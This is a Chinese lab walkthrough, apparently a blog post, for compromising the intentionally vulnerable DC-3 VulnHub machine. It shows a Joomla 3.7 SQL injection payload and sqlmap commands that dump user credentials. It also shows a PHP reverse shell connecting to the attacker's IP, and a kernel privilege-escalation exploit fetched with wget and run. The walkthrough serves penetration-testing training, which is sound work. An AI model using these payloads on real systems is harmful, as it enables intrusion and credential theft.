dc-3靶机渗透

满心欢喜love2024-07-04 16:49

环境准备

dc-3靶机下载链接:

https://download.vulnhub.com/dc/DC-3-2.zip

启动靶机遇到的问题解决文章在下面

http://t.csdnimg.cn/zLQAI

kali最新版 dc-3靶机 两台机器都在vmware上运行 网络设置NAT模式

渗透过程

信息收集

首先使用ifconfig获取kali的IP地址

可以看到 kali的ip为192.168.52.129

接下来使用nmap扫描当前网段活跃主机

nmap -sn 192.168.52.0/24

这里可以看到 dc-3靶机的ip应该是192.168.52.130

继续使用nmap进行下一步的信息收集

nmap -sV -p- 192.168.52.130

进行服务的版本检测和全端口扫描

可以看到 只开放了80端口

那么我们访问一下看看有什么东西

收集一下网站的指纹信息吧

我这边用的是一个火狐的插件-Wappalyzer

可以看到,这边用的是Joomiacms系统

kali上还存在一个专门针对它的漏洞扫描工具Joomscan

joomscan --url http://192.168.52.130

可以看到版本号为3.70

还发现了一个后台地址

漏洞利用

去网上搜了一下,发现3.7是存在一个注入漏洞的尝试复现

直接用的网上的payload

index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x3a,concat(1,(select%20user())),1)%20--+

用户名爆出来了

接下来用sqlmap

sqlmap -u "http://192.168.52.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" --dbs

应该是joomladb这个数据库

python sqlmap.py -u "http://192.168.52.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" -D joomladb --tables

表爆的有点多呀,时间问题就不一个一个试了就是在__users表里

python sqlmap.py -u "http://192.168.52.130/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=" -p "list[fullordering]" -D "joomladb" -T "#__users" -C "username,password" --dump

这里解密出来是snoopy

因为我这边出了一点问题解密过程就不演示了

咱们拿着这个账号密码去登陆后台

也是成功登录进来了

反弹shell

将代码修改为反弹shell的代码

#当系统没有禁用proc_popen的时候,我们是可以借助proc_popen轻松反弹这样的一个shell的。 <?php $sock = fsockopen("192.168.52.129", "1433"); $descriptorspec = array( 0 => $sock, 1 => $sock, 2 => $sock ); $process = proc_open('/bin/sh', $descriptorspec, pipes); proc_close(process); ?>

然后点击save保存

然后访问index.php的同时 kali接收1433端口反弹的数据

成功接收

python -c "import pty;pty.spawn('/bin/bash')"

//使用python 弄一个交互式终端

提权

输入whoami发现是个低权限用户,想办法提权

cat /etc/*release #查看发行版信息 cat /proc/version #查看内核版本的全部信息

Ubuntu 16.04 LTS 内核为Linux 4.4.0-21

查看kali本地漏洞库里面的exp

searchsploit Ubuntu 16.04

39772.txt可以用

查看exp

cat /usr/share/exploitdb/exploits/linux/local/39772.txt

最后有exp地址

在kali中开启apache

systemctl start apache2.service

移动刚刚下载的文件到指定目录

mv 39772.zip /var/www/html

文件下载链接为 http://192.168.52.129/39772.zip

在dc-3的shell中下载该文件

wget http://192.168.52.129/39772.zip

解压exp文件

unzip 39772.zip #解压39772.zip cd 39772 #进入39772 tar -xvf exploit.tar #解压缩exploit.tar

进入 ebpf_mapfd_doubleput_exploit 运行exp

cd ebpf_mapfd_doubleput_exploit

运行方法

./compile.sh ./doubleput

找寻flag

相关推荐
m0_748237051 小时前
sql实战解析-sum()over(partition by xx order by xx)
数据库·sql
羊小猪~~4 小时前
MYSQL学习笔记(四):多表关系、多表查询(交叉连接、内连接、外连接、自连接)、七种JSONS、集合
数据库·笔记·后端·sql·学习·mysql·考研
qq_243050796 小时前
irpas:互联网路由协议攻击套件!全参数详细教程!Kali Linux入门教程!黑客渗透测试!
linux·网络·web安全·网络安全·黑客·渗透测试·系统安全
村口蹲点的阿三6 小时前
Spark SQL 中对 Map 类型的操作函数
javascript·数据库·hive·sql·spark
唯余木叶下弦声8 小时前
PySpark之金融数据分析(Spark RDD、SQL练习题)
大数据·python·sql·数据分析·spark·pyspark
fajianchen8 小时前
记一次线上SQL死锁事故:如何避免死锁?
数据库·sql
chengpei1478 小时前
实现一个自己的spring-boot-starter,基于SQL生成HTTP接口
java·数据库·spring boot·sql·http
码农研究僧13 小时前
Oracle SQL: TRANSLATE 和 REGEXP_LIKE 的知识点详细分析
数据库·sql·oracle·translate·regexp_like
H轨迹H14 小时前
DVWA靶场XSS漏洞通关教程及源码审计
网络安全·渗透测试·xss·dvwa·web漏洞
村口蹲点的阿三17 小时前
spark sql中对array数组类型操作函数列表
大数据·数据库·hive·sql·spark·database
热门推荐
01xgboost: Why not implement distributed XGBoost on top of spark02Dell服务器升级ubuntu 22.04失败解决03半导体应用系统一些小知识收集(strip&wafer mapping,EAP&scada)04ChatGPT + Stable Diffusion + 百度AI + MoviePy 实现文字生成视频,小说转视频,自媒体神器!(二)05(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明06密码学原理技术-第六章-introduction to pulibc-key cryptography07JS设计模式之中介者模式08Windows10安装PCL1.14.0及点云配准09优化手机性能,解决卡顿问题:关闭这3个微信开关,释放内存空间10leetcode - 1769. Minimum Number of Operations to Move All Balls to Each Box